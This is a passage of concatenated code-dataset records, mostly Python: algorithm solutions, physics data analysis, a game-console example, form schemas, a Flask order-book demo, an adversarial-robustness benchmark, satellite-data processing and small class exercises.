(Easy).py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"588808938","text":"class Solution(object):\n def countBits(self, num):\n \"\"\"\n :type num: int\n :rtype: List[int]\n \"\"\"\n ret = []\n for i in range(num + 1):\n temp = i\n count = 0\n while temp > 0:\n if temp % 2 == 1:\n count += 1\n temp //= 2\n # print(\"i = \", i, \"count = \", count)\n ret.append(count)\n return ret\n\n\ns = Solution()\nprint(s.countBits(128))\n","sub_path":"LeetCode/338. Counting Bits.py","file_name":"338. Counting Bits.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"74742808","text":"import math\nimport csv\n\nimport numpy as np\nimport scipy.optimize\n\nfrom elflab import constants, abstracts\nimport elflab.datasets as datasets\n\n# For a pair of R's obtained by the van der Pauw method, compute the sheet resistance Rs, using the Brent1973 method\ndef van_der_Pauw(R_horizontal, R_vertical, xtol=1e-12, rtol=4.4408920985006262e-16, maxiter=100):\n # Defining the equation f(Rs)=0\n def f(Rs):\n A = math.exp(-constants.pi * R_horizontal / Rs)\n B = math.exp(-constants.pi * R_vertical / Rs)\n return A + B - 1.\n if R_horizontal < R_vertical:\n R1 = R_horizontal\n R2 = R_vertical\n else:\n R2 = R_horizontal\n R1 = R_vertical\n Rmin = constants.pi * R1 /constants.ln2 - xtol\n Rmax = constants.pi * (R1+R2) / 2. /constants.ln2 + xtol\n \n Rs = scipy.optimize.brentq(f, Rmin, Rmax, args=(), xtol=xtol, rtol=rtol, maxiter=maxiter, full_output=False, disp=True)\n return Rs\n\n# For a pair of data sets, calculating the sets of sheet resistance by van der Pauw method, using \"param\" as the interpolation parameter\ndef van_der_Pauw_set(set1, set2, param):\n # sort set2 according to param\n set2sorted = set2.sort(param)\n # filter set1 to have param within the range of set2\n indices = [i for i in range(len(set1[param]))\n if (set1[param][i] >= set2sorted[param][0]) and (set1[param][i] <= set2sorted[param][-1])]\n result = set1.empty()\n for key in result:\n result[key] = set1[key][indices]\n # Compute VdP sheet resistance\n set2R = set2sorted.interpolator(param, \"R\")\n set2err = set2sorted.interpolator(param, \"err_R\")\n for i in range(len(result[param])):\n x = result[param][i]\n R1 = result[\"R\"][i]\n dR1 = result[\"err_R\"][i]\n R2 = set2R(x)\n dR2 = set2err(x)\n Rs = van_der_Pauw(R1, R2)\n result[\"R\"][i] = Rs\n result[\"err_R\"][i] = dR1 + dR2 # Very approximately\n return result\n\n# Split MR into down and up sweeps\ndef split_MR_down_up(data):\n # Find the minimum \n index = np.argmin(data[\"H\"])\n up = data.empty()\n down = data.empty()\n for key in data:\n down[key] = data[key][:index].copy()\n up[key] = data[key][index:].copy()\n return (down, up) \n\n \n# Split MR at zero field\ndef split_MR_zero(data):\n index = np.argmin(np.abs(data[\"H\"]))\n a = data.empty()\n b = data.empty()\n for key in data:\n a[key] = data[key][:index].copy()\n b[key] = data[key][index:].copy()\n return (a, b)\n\n \n# Symmetrise / Antisymmetrise magnetoresistance data, by default using linear interpolation\ndef symmetrize_MR(data, mirror, spline_order=1): # data and its mirror\n # Sort the mirror set by H\n sorted_mirror = mirror.sort(\"H\")\n # prepare the interpolators\n mirror_R = mirror.interpolator(\"H\", \"R\", order=spline_order)\n mirror_err_R = mirror.interpolator(\"H\", \"err_R\", order=spline_order)\n \n # filtering through data, only getting data points where H is in range of the mirror\n indices = [i for i in range(len(data[\"H\"]))\n if (data[\"H\"][i] <= -(sorted_mirror[\"H\"][0])) and (data[\"H\"][i] >= -(sorted_mirror[\"H\"][-1]))]\n result = data.empty()\n for key in data:\n result[key] = data[key][indices]\n \n # compute symmetrized R and its standard error\n result[\"R\"] = 0.5 * (result[\"R\"] + mirror_R(-result[\"H\"]))\n result[\"err_R\"] = 0.5 * (result[\"err_R\"]**2 + mirror_err_R(-result[\"H\"])**2)**0.5\n \n return result\n \ndef antisymmetrize_MR(data, mirror, spline_order=1): # data and its mirror\n # Sort the mirror set by H\n sorted_mirror = mirror.sort(\"H\")\n # prepare the interpolators\n mirror_R = mirror.interpolator(\"H\", \"R\", order=spline_order)\n mirror_err_R = mirror.interpolator(\"H\", \"err_R\", order=spline_order)\n \n # filtering through data, only getting data points where H is in range of the mirror\n indices = [i for i in range(len(data[\"H\"]))\n if (data[\"H\"][i] <= -(sorted_mirror[\"H\"][0])) and (data[\"H\"][i] >= -(sorted_mirror[\"H\"][-1]))]\n result = data.empty()\n for key in data:\n result[key] = data[key][indices]\n \n # compute symmetrized R and its standard error\n result[\"R\"] = 0.5 * (result[\"R\"] - mirror_R(-result[\"H\"]))\n result[\"err_R\"] = 0.5 * (result[\"err_R\"]**2 + mirror_err_R(-result[\"H\"])**2)**0.5\n \n return result\n","sub_path":"analysis/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"143222406","text":"#!/usr/bin/env python3\n# To the extent possible under law, the libtcod maintainers have waived all\n# copyright and related or neighboring rights for this script. This work is\n# published from: United States.\n# https://creativecommons.org/publicdomain/zero/1.0/\n\"\"\"An example showing the console being resized to fit the window.\"\"\"\nfrom typing import Tuple\n\nimport tcod\nimport tcod.event\nimport tcod.tileset\n\nimport custrender # Using the custom renderer engine.\n\n\ndef fit_console(width: int, height: int) -> Tuple[int, int]:\n \"\"\"Return a console resolution the fits the given pixel resolution.\"\"\"\n # Use the current active tileset as a reference.\n tileset = tcod.tileset.get_default()\n return width // tileset.tile_width, height // tileset.tile_height\n\n\ndef main() -> None:\n window_flags = (\n tcod.lib.SDL_WINDOW_RESIZABLE | tcod.lib.SDL_WINDOW_MAXIMIZED\n )\n renderer_flags = tcod.lib.SDL_RENDERER_PRESENTVSYNC\n with custrender.init_sdl2(640, 480, None, window_flags, renderer_flags):\n console = tcod.console.Console(\n *fit_console(*custrender.get_renderer_size())\n )\n TEXT = \"Resizable console with no stretching.\"\n while True:\n console.clear()\n\n # Draw the checkerboard pattern.\n console.tiles[\"bg\"][::2, ::2] = (32, 32, 32, 255)\n console.tiles[\"bg\"][1::2, 1::2] = (32, 32, 32, 255)\n\n console.print_box(0, 0, 0, 0, TEXT)\n\n # These functions are explained in `custrender.py`.\n custrender.clear((0, 0, 0))\n custrender.accumulate(\n console, custrender.get_viewport(console, True, True)\n )\n custrender.present()\n\n for event in tcod.event.wait():\n if event.type == \"QUIT\":\n raise SystemExit()\n elif event.type == \"WINDOWRESIZED\":\n # Replace `console` with a new one of the correct size.\n console = tcod.console.Console(\n *fit_console(event.width, event.height)\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/experimental/resizable_console.py","file_name":"resizable_console.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473833001","text":"import json\nfrom typing import List\n\nfrom c2cgeoform.schema import GeoFormSchemaNode\nimport colander\nfrom deform.widget import MappingWidget, SelectWidget, SequenceWidget, TextAreaWidget\n\nfrom c2cgeoportal_admin import _\nfrom c2cgeoportal_commons.lib.validators import url\nfrom c2cgeoportal_commons.models.main import Metadata\n\n\n@colander.deferred\ndef metadata_definitions(node, kw): # pylint: disable=unused-argument\n return {m[\"name\"]: m for m in kw[\"request\"].registry.settings[\"admin_interface\"][\"available_metadata\"]}\n\n\n@colander.deferred\ndef metadata_name_widget(node, kw): # pylint: disable=unused-argument\n return SelectWidget(\n values=[\n (m[\"name\"], m[\"name\"])\n for m in sorted(\n kw[\"request\"].registry.settings[\"admin_interface\"][\"available_metadata\"],\n key=lambda m: m[\"name\"],\n )\n ]\n )\n\n\ndef json_validator(node, value):\n try:\n json.loads(value)\n except ValueError as e:\n raise colander.Invalid(node, _('Parser report: \"{}\"').format(str(e)))\n\n\ndef regex_validator(node, value):\n definition = node.metadata_definitions[value[\"name\"]]\n if definition.get(\"type\", \"string\") == \"regex\":\n validator = colander.Regex(definition[\"regex\"], msg=_(definition[\"error_message\"]))\n try:\n validator(node[\"string\"], value[\"string\"])\n except colander.Invalid as e:\n error = colander.Invalid(node)\n error.add(e, node.children.index(node[\"string\"]))\n raise error\n\n\nclass MetadataSchemaNode(GeoFormSchemaNode): # pylint: disable=abstract-method\n\n metadata_definitions = None\n\n def __init__(self, *args, **kw):\n super().__init__(*args, **kw)\n\n self.available_types: List[str] = []\n\n self._add_value_node(\"string\", colander.String())\n self._add_value_node(\"liste\", colander.String())\n self._add_value_node(\"boolean\", colander.Boolean())\n self._add_value_node(\"int\", colander.Int())\n self._add_value_node(\"float\", colander.Float())\n self._add_value_node(\"url\", colander.String(), validator=url)\n self._add_value_node(\n \"json\", colander.String(), widget=TextAreaWidget(rows=10), validator=json_validator\n )\n\n def _add_value_node(self, type_name, colander_type, **kw):\n self.add_before(\n \"description\",\n colander.SchemaNode(colander_type, name=type_name, title=_(\"Value\"), missing=colander.null, **kw),\n )\n self.available_types.append(type_name)\n\n def objectify(self, dict_, context=None):\n # depending on the type get the value from the right widget\n dict_[\"value\"] = dict_[self._ui_type(dict_[\"name\"])]\n return super().objectify(dict_, context)\n\n def dictify(self, obj):\n dict_ = super().dictify(obj)\n value = obj.value or colander.null\n # depending on the type set the value in the right widget\n dict_[self._ui_type(obj.name)] = value\n return dict_\n\n def _ui_type(self, metadata_name):\n # pylint: disable=unsubscriptable-object\n metadata_type = self.metadata_definitions[metadata_name].get(\"type\", \"string\")\n return metadata_type if metadata_type in self.available_types else \"string\"\n\n\nmetadatas_schema_node = colander.SequenceSchema(\n MetadataSchemaNode(\n Metadata,\n name=\"metadata\",\n metadata_definitions=metadata_definitions,\n validator=regex_validator,\n widget=MappingWidget(template=\"metadata\"),\n overrides={\"name\": {\"widget\": metadata_name_widget}},\n ),\n name=\"metadatas\",\n title=_(\"Metadatas\"),\n metadata_definitions=metadata_definitions,\n widget=SequenceWidget(template=\"metadatas\", category=\"structural\"),\n)\n","sub_path":"admin/c2cgeoportal_admin/schemas/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"459858787","text":"from sys import stdin\nfrom collections import Counter\n\nT = int(stdin.readline())\n\nfor t in range(T):\n N = int(stdin.readline())\n c = Counter()\n for _ in range(2 * N - 1):\n c.update(int(i) for i in stdin.readline().split())\n missing = [i for (i,v) in c.most_common() if v % 2 == 1]\n missing.sort()\n print('Case #{}: {}'.format(t + 1, \" \".join(str(i) for i in missing)))\n\n \n","sub_path":"codes/CodeJamCrawler/16_1_2/Math.Wizard.Boy/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"434551778","text":"\"\"\"The direction enums of a Hex.\"\"\"\n\nfrom enum import IntEnum\n\n\nclass HexSideDir(IntEnum):\n \"\"\"The direction of a HexSide.\"\"\"\n UL = 0\n UR = 1\n R = 2\n LR = 3\n LL = 4\n L = 5\n\n def isAdjacent(self, otherDir):\n \"\"\"Returns true if the other direction is adjacent of this direction.\"\"\"\n if self == HexSideDir.UL:\n return otherDir == HexSideDir.L or otherDir == HexSideDir.UR\n if self == HexSideDir.UR:\n return otherDir == HexSideDir.UL or otherDir == HexSideDir.R\n if self == HexSideDir.R:\n return otherDir == HexSideDir.UR or otherDir == HexSideDir.LR\n if self == HexSideDir.LR:\n return otherDir == HexSideDir.R or otherDir == HexSideDir.LL\n if self == HexSideDir.LL:\n return otherDir == HexSideDir.LR or otherDir == HexSideDir.L\n if self == HexSideDir.L:\n return otherDir == HexSideDir.LL or otherDir == HexSideDir.UL\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def getAdjacentSides(self):\n \"\"\"Returns a tuple of the two adjacent directions.\"\"\"\n if self == HexSideDir.UL:\n return (HexSideDir.L, HexSideDir.UR)\n if self == HexSideDir.UR:\n return (HexSideDir.UL, HexSideDir.R)\n if self == HexSideDir.R:\n return (HexSideDir.UR, HexSideDir.LR)\n if self == HexSideDir.LR:\n return (HexSideDir.R, HexSideDir.LL)\n if self == HexSideDir.LL:\n return (HexSideDir.LR, HexSideDir.L)\n if self == HexSideDir.L:\n return (HexSideDir.LL, HexSideDir.UL)\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def opposite(self):\n \"\"\"Get the opposite direction of a give HexSideDir.\"\"\"\n if self == HexSideDir.UL:\n return HexSideDir.LR\n if self == HexSideDir.UR:\n return HexSideDir.LL\n if self == HexSideDir.R:\n return HexSideDir.L\n if self == HexSideDir.LR:\n return HexSideDir.UL\n if self == HexSideDir.LL:\n return HexSideDir.UR\n if self == HexSideDir.L:\n return HexSideDir.R\n raise AssertionError(\"Invalid Hex Side direction.\")\n\n def connectedVertexDirs(self):\n \"\"\"Get the vertices associated with this direction.\n\n Returns:\n (HexVertexDir, HexVertexDir): The two vertex directions associated with this direction.\n The return will always be sorted according to this order: T, UR, LR, B, LL, UR\n \"\"\"\n\n if self == HexSideDir.UL:\n return (HexVertexDir.T, HexVertexDir.UL)\n if self == HexSideDir.UR:\n return (HexVertexDir.T, HexVertexDir.UR)\n if self == HexSideDir.R:\n return (HexVertexDir.UR, HexVertexDir.LR)\n if self == HexSideDir.LR:\n return (HexVertexDir.LR, HexVertexDir.B)\n if self == HexSideDir.LL:\n return (HexVertexDir.LL, HexVertexDir.B)\n if self == HexSideDir.L:\n return (HexVertexDir.UL, HexVertexDir.LL)\n raise AssertionError(f\"Invalid side direction: {self}\")\n\n def __str__(self):\n if self == HexSideDir.UL:\n return \"UL\"\n if self == HexSideDir.UR:\n return \"UR\"\n if self == HexSideDir.R:\n return \"R\"\n if self == HexSideDir.LR:\n return \"LR\"\n if self == HexSideDir.LL:\n return \"LL\"\n if self == HexSideDir.L:\n return \"L\"\n raise AssertionError(\"Invalid Hex Side direction\")\n\n\nclass HexVertexDir(IntEnum):\n \"\"\"The direction of a HexVertex.\"\"\"\n T = 0\n UR = 1\n LR = 2\n B = 3\n LL = 4\n UL = 5\n\n def opposite(self):\n \"\"\"Returns the opposite direction of this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return HexVertexDir.B\n if self == HexVertexDir.UR:\n return HexVertexDir.LL\n if self == HexVertexDir.LR:\n return HexVertexDir.UL\n if self == HexVertexDir.B:\n return HexVertexDir.T\n if self == HexVertexDir.LL:\n return HexVertexDir.UR\n if self == HexVertexDir.UL:\n return HexVertexDir.LR\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def getAdjacentVertexDirs(self):\n \"\"\"Returns a tuple of the two VertexDirs that are adjacent to this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return (HexVertexDir.UL, HexVertexDir.UR)\n if self == HexVertexDir.UR:\n return (HexVertexDir.T, HexVertexDir.LR)\n if self == HexVertexDir.LR:\n return (HexVertexDir.UR, HexVertexDir.B)\n if self == HexVertexDir.B:\n return (HexVertexDir.LR, HexVertexDir.LL)\n if self == HexVertexDir.LL:\n return (HexVertexDir.B, HexVertexDir.UL)\n if self == HexVertexDir.UL:\n return (HexVertexDir.LL, HexVertexDir.T)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def get120DegVertices(self):\n \"\"\"Returns a tuple of the two VertexDirs that are 120 degrees from this VertexDir.\"\"\"\n if self == HexVertexDir.T:\n return (HexVertexDir.LL, HexVertexDir.LR)\n if self == HexVertexDir.UR:\n return (HexVertexDir.UL, HexVertexDir.B)\n if self == HexVertexDir.LR:\n return (HexVertexDir.T, HexVertexDir.LL)\n if self == HexVertexDir.B:\n return (HexVertexDir.UR, HexVertexDir.UL)\n if self == HexVertexDir.LL:\n return (HexVertexDir.LR, HexVertexDir.T)\n if self == HexVertexDir.UL:\n return (HexVertexDir.B, HexVertexDir.UR)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def connectedSideDirs(self):\n \"\"\"Get the `HexSideDirs` connected to this vertex direction.\n\n Returns:\n (HexSide, HexSide): The two side directions connected to this vertex direction.\n \"\"\"\n if self == HexVertexDir.T:\n return (HexSideDir.UL, HexSideDir.UR)\n if self == HexVertexDir.UR:\n return (HexSideDir.UR, HexSideDir.R)\n if self == HexVertexDir.LR:\n return (HexSideDir.R, HexSideDir.LR)\n if self == HexVertexDir.B:\n return (HexSideDir.LR, HexSideDir.LL)\n if self == HexVertexDir.LL:\n return (HexSideDir.LL, HexSideDir.L)\n if self == HexVertexDir.UL:\n return (HexSideDir.L, HexSideDir.UL)\n raise AssertionError(\"Invalid Hex Vertex direction\")\n\n def __str__(self):\n if self == HexVertexDir.T:\n return \"T\"\n if self == HexVertexDir.UR:\n return \"UR\"\n if self == HexVertexDir.LR:\n return \"LR\"\n if self == HexVertexDir.B:\n return \"B\"\n if self == HexVertexDir.LL:\n return \"LL\"\n if self == HexVertexDir.UL:\n return \"UL\"\n raise AssertionError(\"Invalid Hex Vertex direction\")\n","sub_path":"hex_dir.py","file_name":"hex_dir.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447018795","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom string import ascii_lowercase\n\n# returns a float\ndef getFullSum():\n # use creds to create a client to interact with the Google Drive API\n scope = ['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name('google_cred.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Budget, Info, Prices\n file = client.open(\"Python Budget\")\n worksheet = file.worksheet(\"Info\")\n\n # Extract and print all of the values\n # list_of_hashes = worksheet.get_all_records()\n fullSum = worksheet.acell('G7').value\n full100 = worksheet.acell('G8').value\n fullText = float(full100) - float(fullSum)\n return fullText\n\ndef getBudget():\n # use creds to create a client to interact with the Google Drive API\n scope = ['https://spreadsheets.google.com/feeds']\n creds = ServiceAccountCredentials.from_json_keyfile_name('google_cred.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Budget, Info, Prices\n file = client.open(\"Python Budget\")\n worksheet = file.worksheet(\"Budget\")\n\n # lastCell is used to hold the last value and then counter is used to calculate\n # when I need to add a second letter\n lastCellValue = \"\"\n lastCell = \"\"\n counter = 0\n for c in ascii_lowercase:\n cell = c + str(1)\n value = worksheet.acell(cell).value\n counter = counter + 1\n if float(value) == 0.00:\n cellNumber = ord(c) - 1\n lastCell = str(chr(cellNumber)) + str(1)\n lastCellValue = worksheet.acell(lastCell).value\n break\n return float(lastCellValue)\n\ndef beautifulBudget():\n fullSum = getFullSum()\n weekBudget = 100 - getBudget()\n\n formatedBudget = \"Week Budget : \" + str(weekBudget) + \"\\n\" + \"Full Budget: \" + str(fullSum)\n\n return formatedBudget\n","sub_path":"google_drive.py","file_name":"google_drive.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"150032415","text":"#!flask/bin/python\nfrom flask import Flask, request, jsonify\nimport json\nfrom lightmatchingengine.lightmatchingengine import LightMatchingEngine, Side\n\napp = Flask(__name__)\nlme = LightMatchingEngine()\n\n@app.route('/')\ndef index():\n return 'Light Matching Machine REST Demo'\n\n@app.route('/order', methods=['POST'])\ndef submitOrder():\n content = request.get_json()\n print(content)\n instrument = content['instrument']\n price = content['price']\n quantity = content['quantity']\n side = Side.BUY if content['side'] == 'buy' else Side.SELL\n order, trades = lme.add_order(instrument, price, quantity, side)\n return_result = {'status': 'success', 'order-id': order.order_id}\n\n return jsonify(return_result)\n\n@app.route('/order//', methods=['GET'])\ndef lookupOrder(order_book, order_id):\n converted_trade_pair = order_book.replace('-', '/')\n print ('/order/ {}'.format(lme.order_books))\n orderbook = lme.order_books[converted_trade_pair]\n if orderbook == None:\n return jsonify({'status': 'error', 'message': 'trading pair {} not found'.format(converted_trade_pair)})\n else:\n order = orderbook.order_id_map[order_id]\n\n if order == None:\n return jsonify({'status': 'error', 'message': 'order {} not found'.format(order_id)})\n return json.dumps(order.__dict__)\n\n@app.route('/orderbook//', methods=['GET'])\ndef lookupOrderbook(symbol, side):\n converted_trade_pair = symbol.replace('-', '/')\n side = side.lower()\n if converted_trade_pair not in lme.order_books:\n return jsonify({'status': 'error', 'message': 'trading pair {} not found'.format(converted_trade_pair)})\n orderbook = lme.order_books[converted_trade_pair]\n orders = []\n if side == 'buy' or side == 'bid':\n return jsonify({'side': 'bid', 'depth': len(orderbook.bids) , 'orders': orderbook.json('bid')})\n elif side == 'sell' or side == 'ask': \n return jsonify({'side': 'ask', 'depth': len(orderbook.asks) , 'orders': orderbook.json('ask')})\n\n return '{}'\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"lmeRest.py","file_name":"lmeRest.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"470797237","text":"from realsafe.cifar10.wideresnet_trades import WideResNet_TRADES\nfrom realsafe.benchmark.distortion_benchmark import DistortionBenchmarkBuilder\nfrom realsafe.benchmark.utils import distortion_benchmark_parser, new_session\nimport tensorflow as tf\nimport numpy as np\n\nSESSION = new_session()\n\n\nargs = distortion_benchmark_parser()\n\nMODEL = WideResNet_TRADES()\n\nMODEL.load(session=SESSION)\nITERATION = 20\n\nbuilder = DistortionBenchmarkBuilder()\nbuilder.init_distortion_l_2(32.0 * (MODEL.x_max - MODEL.x_min))\nbuilder.init_distortion_l_inf(1.0 * (MODEL.x_max - MODEL.x_min))\nbuilder.search_steps(0)\nbuilder.binsearch_steps(14)\nbuilder.batch_size(100)\n\nbuilder.config_init_l_2('bim', {})\nbuilder.config_l_2('bim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\nbuilder.config_init_l_inf('bim', {})\nbuilder.config_l_inf('bim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\n\nbuilder.config_init_l_2('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_2('mim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\nbuilder.config_init_l_inf('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_inf('mim', {\n 'iteration': ITERATION,\n 'session': SESSION\n})\n\n\nbuilder.config_init_l_2('fgsm', {})\nbuilder.config_l_2('fgsm', {\n 'session': SESSION\n})\nbuilder.config_init_l_inf('fgsm', {})\nbuilder.config_l_inf('fgsm', {\n 'session': SESSION\n})\n\nbenchmark = \\\n builder.build(SESSION, MODEL, args.method, args.goal, args.distance_metric)\n\nxs_ph = tf.placeholder(tf.float32, shape=(None, *MODEL.x_shape))\n_, labels = MODEL.logits_and_labels(xs_ph)\n\nfor arg_xs, arg_ys, arg_ys_target, arg_output in \\\n zip(args.xs, args.ys, args.ys_target, args.output):\n print(arg_xs)\n print(arg_ys)\n print(arg_ys_target)\n print(arg_output)\n\n xs = np.load(arg_xs).astype(MODEL.x_dtype.as_numpy_dtype)\n xs = (xs / 255.0) * (MODEL.x_max - MODEL.x_min) + MODEL.x_min\n ys = np.load(arg_ys).astype(MODEL.y_dtype.as_numpy_dtype)\n ys_target = np.load(arg_ys_target).astype(MODEL.y_dtype.as_numpy_dtype)\n\n np.save(arg_output, benchmark.run(xs, ys, ys_target))\n ys_adv = SESSION.run(labels, feed_dict={xs_ph: np.load(arg_output)})\n print((ys_adv == ys).astype(np.float32).mean())\n print((ys_adv == ys_target).astype(np.float32).mean())\n","sub_path":"benchmark-v2/cifar_trades_distortion.py","file_name":"cifar_trades_distortion.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"525023771","text":"\"\"\"\r\n\n\nGiven a word, create a function which returns whether or not it's possible to\n**create a palindrome** by _rearranging the letters in the word_.\n\n### Examples\n\n is_palindrome_possible(\"rearcac\") ➞ True\n # You can make \"racecar\"\n \n is_palindrome_possible(\"suhbeusheff\") ➞ True\n # You can make \"sfuehbheufs\" (not a real word but still a palindrome)\n \n is_palindrome_possible(\"palindrome\") ➞ False\n # It's impossible\n\n### Notes\n\n * Trivially, words which are already palindromes return `True`.\n * Words are given in all _lowercase_.\n\n\"\"\"\r\n\ndef is_palindrome_possible(txt):\n lst=[]\n cnt=0\n for i in txt:\n lst.append([i,txt.count(i)])\n for i in lst:\n if i[1]%2!=0:\n cnt+=1\n if cnt>1:\n return False\n break\n return True\n\n","sub_path":"eyJ4mN6RpyiRTvSob_22.py","file_name":"eyJ4mN6RpyiRTvSob_22.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"400441669","text":"\n\n#calss header\nclass _DICTATOR():\n\tdef __init__(self,): \n\t\tself.name = \"DICTATOR\"\n\t\tself.definitions = [u'a leader who has complete power in a country and has not been elected by the people', u'a person who gives orders and behaves as if they have complete power: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_dictator.py","file_name":"_dictator.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"427793739","text":"\"\"\"\nProcessMODISdata.py\n\nMain program for processing MODIS raw data. This program is responsible for\n* checking that processed files are not already present\n* distributing files to process over user specified number of cores\n* delegating actual processing to helper class\n\n\"\"\"\n__author__ = 'Jane'\n\nimport sys\nimport argparse\nimport modis_config.src.configuration as cfg\nimport modis_config.src.constants as cfg_const\nimport gdal_processing as proc\n\ndef create_parser(args=None):\n \"\"\"\n Set up and process arguments passed into program\n :param args: optional argument which defaults to nothing, only used in testing.\n :return: Invocation arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='All configuration parameters are contained in ./land_cover_config.ini'\n 'Use -f switch to override with an alternative file.')\n parser.add_argument('-file', '-f', default=cfg_const.defs['file'], nargs='?',\n help=\"Name of configuration file to load\")\n parser.add_argument('-test', '-t', action=\"store_true\",\n help=\"Run program in test mode, development only\")\n return parser.parse_args(args=args)\n\n\ndef main(args):\n \"\"\"\n\n :param args: Namespace object containing given command line options\n\n :return: none\n :except: IOError if there is no configuration file\n :except: RuntimeError if configuration file is incomplete\n \"\"\"\n config = cfg.Configuration()\n processing = proc.GdalProcessing()\n\n # Let's check the command line switches\n # if we're given a file, load the info.\n try:\n if args.file != cfg_const.defs['file']:\n config.read_config(cfg.Config_mode.MODISproc, args.file)\n else:\n config.read_config(cfg.Config_mode.MODISproc, cfg_const.defs['file'])\n except IOError:\n print(\"Missing configuration file. Exiting.\")\n sys.exit(1)\n except RuntimeError:\n print(\"Configuration file has values missing. Exiting.\")\n sys.exit(1)\n\n # pass config instance to gdal_processing\n processing.set_config_object(config)\n try:\n processing.do_gdal_processing(args.test)\n except IOError:\n sys.exit(1)\n\nif __name__ == '__main__':\n parse_args = create_parser()\n main(parse_args)\n","sub_path":"Operational python/ProcessMOD/src/processMODISdata.py","file_name":"processMODISdata.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"44419263","text":"# -*- coding: utf-8 -*-\n\"\"\"The Windows services event formatter.\n\nThe Windows services are derived from Windows Registry files.\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom plaso.formatters import manager\nfrom plaso.formatters import interface\nfrom plaso.winnt import human_readable_service_enums\n\n\nclass WinRegistryServiceFormatter(interface.ConditionalEventFormatter):\n \"\"\"Formatter for a Windows service event.\"\"\"\n\n DATA_TYPE = 'windows:registry:service'\n\n FORMAT_STRING_PIECES = [\n '[{key_path}]',\n 'Type: {service_type}',\n 'Start: {start_type}',\n 'Image path: {image_path}',\n 'Error control: {error_control}',\n '{values}']\n\n FORMAT_STRING_SHORT_PIECES = [\n '[{key_path}]',\n 'Type: {service_type}',\n 'Start: {start_type}',\n 'Image path: {image_path}',\n 'Error control: {error_control}',\n '{values}']\n\n def __init__(self):\n \"\"\"Initializes a Windows service event format helper.\"\"\"\n super(WinRegistryServiceFormatter, self).__init__()\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='error_control',\n output_attribute='error_control', values=(\n human_readable_service_enums.SERVICE_ENUMS['ErrorControl']))\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='service_type',\n output_attribute='service_type', values=(\n human_readable_service_enums.SERVICE_ENUMS['Type']))\n\n self.helpers.append(helper)\n\n helper = interface.EnumerationEventFormatterHelper(\n default='UNKNOWN', input_attribute='start_type',\n output_attribute='start_type', values=(\n human_readable_service_enums.SERVICE_ENUMS['Start']))\n\n self.helpers.append(helper)\n\n\nmanager.FormattersManager.RegisterFormatter(WinRegistryServiceFormatter)\n","sub_path":"plaso/formatters/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627764419","text":"# Author: Jorge Rodriguez\n# Date: April 25, 2017\n# Employee and ProductionWorker Class, assignment\n\nfrom chapter11 import employee\n\n# Get employee information\nname = input(\"Enter Production Worker employee's name: \")\nemp_number = input(\"Employee's number: \")\nshift = int(input(\"Shift number (day=1 or night=2): \"))\npay_rate = input(\"Hourly pay rate: $\")\n\n# Determine the 